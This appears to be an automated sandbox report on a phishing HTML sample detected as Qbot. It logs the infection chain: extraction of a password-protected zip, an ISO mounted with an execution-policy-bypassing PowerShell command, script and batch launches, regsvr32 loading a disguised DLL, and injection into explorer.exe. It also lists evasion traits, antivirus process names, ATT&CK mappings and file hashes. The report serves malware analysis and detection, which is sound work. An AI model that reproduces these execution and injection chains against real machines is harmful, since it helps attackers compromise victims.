          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4872 Thread sleep count: 8543 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5184 Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4408 Thread sleep count: 115 > 30
          Source: C:\Windows\SysWOW64\explorer.exe TID: 3416 Thread sleep count: 4271 > 30
          Source: C:\Windows\SysWOW64\explorer.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_29-13005
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\unarchiver.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8543
          Source: C:\Windows\SysWOW64\explorer.exe Window / User API: threadDelayed 4271
          Source: C:\Windows\SysWOW64\explorer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_29-11352
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
          Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\unarchiver.exe Code function: 9_2_00CFB29A GetSystemInfo,9_2_00CFB29A
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_032EC134 FindFirstFileW,FindNextFileW,29_2_032EC134
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_032EEFB8 LoadLibraryA,GetProcAddress,29_2_032EEFB8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\unarchiver.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 712 base: 32D0000 value: B8
          Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 712 base: 30042D8 value: 00
          Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 712 base: 30051E8 value: 00
          Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 712 base: 3310000 value: 9C
          Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 712 base: 93F380 value: E9
          Source: C:\Windows\SysWOW64\unarchiver.exe Process created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pabc444 -y -o"C:\Users\user\AppData\Local\Temp\idbrycd1.fis" "C:\Users\user\Downloads\Calculation#8785(Sep16).zip
          Source: C:\Windows\SysWOW64\unarchiver.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso
          Source: C:\Windows\SysWOW64\unarchiver.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "E:\more\seeSay.js"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso"
          Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""E:\more\myTheir.bat" r egs v"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 more/veryAs.db
          Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\unarchiver.exe Queries volume information: \Device\CdRom1\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\unarchiver.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_032EA202 GetSystemTimeAsFileTime,29_2_032EA202
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_032EDE84 GetVersionExA,GetCurrentProcessId,29_2_032EDE84
          Source: regsvr32.exe, 0000001B.00000003.499916035.0000000004D6F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdagent.exe
          Source: regsvr32.exe, 0000001B.00000003.499916035.0000000004D6F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vsserv.exe
          Source: regsvr32.exe, 0000001B.00000003.499916035.0000000004D6F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
          Source: regsvr32.exe, 0000001B.00000003.499916035.0000000004D6F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgcsrvx.exe
          Source: regsvr32.exe, 0000001B.00000003.499916035.0000000004D6F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mcshield.exe
          Source: regsvr32.exe, 0000001B.00000003.499916035.0000000004D6F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          Source: Yara match File source: 27.2.regsvr32.exe.31b0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 29.0.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 29.2.explorer.exe.32e0000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 29.2.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 27.2.regsvr32.exe.31b0000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 29.0.explorer.exe.32e0000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match, File source: 27.2.regsvr32.exe.31b0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 29.0.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 29.2.explorer.exe.32e0000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 29.2.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 27.2.regsvr32.exe.31b0000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 29.0.explorer.exe.32e0000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
          Execution: Scripting (111); Native API (3); PowerShell (1); At (Windows); Cron; Launchd; Scheduled Task
          Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Privilege Escalation: Process Injection (211); DLL Side-Loading (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Defense Evasion: Masquerading (3); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (211); Scripting (111); Obfuscated Files or Information (2); DLL Side-Loading (1)
          Credential Access: Credential API Hooking (1); Input Capture (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
          Discovery: System Time Discovery (1); Security Software Discovery (21); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (15)
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
          Collection: Screen Capture (1); Credential API Hooking (1); Input Capture (1); Archive Collected Data (1); Keylogging; GUI Input Capture; Web Portal Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
          Behavior Graph ID: 704342, Sample: Calculation#8785(Sep16).html, Startdate: 16/09/2022, Architecture: WINDOWS, Score: 84

          Process tree and signatures shown in the graph:
          • Sample: Malicious sample detected (through community Yara rule); Phishing site detected (based on favicon image match); Yara detected Qbot
          • Sample started chrome.exe (twice); the first chrome.exe contacted 192.168.2.1 and 239.255.255.250 and started unarchiver.exe and a child chrome.exe
          • Child chrome.exe contacted clients.l.google.com (142.250.180.174, 443, 49727, GOOGLEUS, United States), www.google.com (142.250.184.100, 443, 49732, 49799, GOOGLEUS, United States) and 4 other IPs or domains
          • unarchiver.exe: Uses 7zip to decompress a password protected archive; started wscript.exe, cmd.exe and 7za.exe
          • 7za.exe dropped C:\Users\user\...\Calculation#8785.iso (ISO) and started conhost.exe
          • cmd.exe (child of unarchiver.exe) started powershell.exe and conhost.exe
          • wscript.exe: Wscript starts Powershell (via cmd or directly); started cmd.exe, which started regsvr32.exe and conhost.exe
          • regsvr32.exe: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Injects code into the Windows Explorer (explorer.exe); Maps a DLL or memory area into another process; started explorer.exe

          No Antivirus matches
          No Antivirus matches
| Source | Detection | Scanner | Label |
|---|---|---|---|
| 27.2.regsvr32.exe.31b0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 |
| 29.0.explorer.exe.32e0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 |
| 29.2.explorer.exe.32e0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 |
          No Antivirus matches
          No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| accounts.google.com | 142.250.184.45 | true | false | | high |
| www.google.com | 142.250.184.100 | true | false | | high |
| clients.l.google.com | 142.250.180.174 | true | false | | high |
| use.typekit.net | unknown | unknown | false | | high |
| clients2.google.com | unknown | unknown | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard | false | | high |
| https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 | false | | high |
| file:///C:/Users/user/Desktop/Calculation%238785(Sep16).html | true | | low |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 142.250.184.45 | accounts.google.com | United States | 15169 | GOOGLEUS | false |
| 239.255.255.250 | unknown | Reserved | unknown | unknown | false |
| 142.250.184.100 | www.google.com | United States | 15169 | GOOGLEUS | false |
| 142.250.180.174 | clients.l.google.com | United States | 15169 | GOOGLEUS | false |
                                                                  IP
                                                                  192.168.2.1
                                                                  127.0.0.1
                                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                  Analysis ID:704342
                                                                  Start date and time:2022-09-16 19:13:10 +02:00
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 9m 48s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Sample file name:Calculation#8785(Sep16).html
                                                                  Cookbook file name:defaultwindowshtmlcookbook.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:34
                                                                  Number of new started drivers analysed:3
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal84.phis.troj.evad.winHTML@48/9@5/6
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HDC Information:
                                                                  • Successful, ratio: 25% (good quality ratio 23.5%)
                                                                  • Quality average: 76.2%
                                                                  • Quality standard deviation: 27.1%
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 58
                                                                  • Number of non-executed functions: 22
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .html
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, vhdmp.sys, RuntimeBroker.exe, backgroundTaskHost.exe, fsdepends.sys, cdfs.sys, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 23.50.105.163, 142.250.184.99, 34.104.35.123, 173.222.108.232, 173.222.108.216, 20.223.24.244, 142.250.180.131
                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, edgedl.me.gvt1.com, use-stls.adobe.com.edgesuite.net, e16604.g.akamaiedge.net, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, a1988.dscg1.akamai.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                  • Not all processes were analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.
| Time | Type | Description |
|---|---|---|
| 19:15:08 | API Interceptor | 31x Sleep call for process: powershell.exe modified |
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):58152
                                                                                                          Entropy (8bit):5.034192745399562
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:SozV3CNBQkj2Lh4iUxpaVXflJnuvtqdZ56/zFzgVx1Uzj7vioBnNe7oZtUtQOdBi:HzV3CNBQkj2LqiUpaVXflJnuvtqdZ565
                                                                                                          MD5:3C02450B486E89D37CF9FC3D94B41DDA
                                                                                                          SHA1:E518483BA22EE1889ACD4ABF3A8DB69E1F8F5192
                                                                                                          SHA-256:3DFBB41798333B477BEF3EF266F2C1247ED019E050F93E2BAEB1072AB7060D11
                                                                                                          SHA-512:1946964DFC085F233F6EC1B3198F27812D54EFBC29D6243E5AA3D49E1691391CD0413FED04E01136838A4BD0A989FEE1B3536D9A368A9BCE996B02711D737191
                                                                                                          Malicious:false
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21684
                                                                                                          Entropy (8bit):5.598418726405245
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:VtCFy02osDx0N4Hz4upSBxnzjulrI0iJ9ghSJ3uyV1j4zmtGBy9m1lz6SZUYA:qAxAUl4xzClrxhcueTkMSnA
                                                                                                          MD5:94C989D59CD823ABF3E21289A026392A
                                                                                                          SHA1:2F31E2D2078C5BFC8FDF24327AAA5F333A12ECC0
                                                                                                          SHA-256:458F1DF933ADF66B2E3070F2A667701F64A5F1DB1D2690FDC2ACA1F29D6E7EBD
                                                                                                          SHA-512:4D5F99145764DB65424C3251D1B9EF053A71AB8B24106B15657AAF359064337BE76A6FFD446F836CC5410554852CA52478322590249A39B851370A565A952E2F
                                                                                                          Malicious:false
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1
                                                                                                          Process:C:\Windows\SysWOW64\7za.exe
                                                                                                          File Type:ISO 9660 CD-ROM filesystem data 'CD_ROM'
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1038336
                                                                                                          Entropy (8bit):6.407677009464969
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:FwadVwjHYHHWHCrwUwvPwewGHHQkg1H5wbgnS/4j5+/xH9YQUoIs95:FwadVwjHYHHWHCrwUwXwewGHHQkg1H5g
                                                                                                          MD5:43A7E6ABE10774F7B5DCDBC479E9742B
                                                                                                          SHA1:A293A24763DBDC78E71A93CA75FA635512710B37
                                                                                                          SHA-256:75F51C1238D8064298F231D387892C58BCA859EC7087FD10E6E1A0A493F6F30A
                                                                                                          SHA-512:D288B44610A2EF15ED99CAAE725B61E27EDBBD920F23895D41CB86270CA16A441801A99E448DBA2621345560649C91692DE6967F96EDBF9239D214D1F35A0749
                                                                                                          Malicious:true
                                                                                                          Preview
                                                                                                          Process:C:\Windows\SysWOW64\unarchiver.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1764
                                                                                                          Entropy (8bit):5.2307670297869695
                                                                                                          Encrypted:false
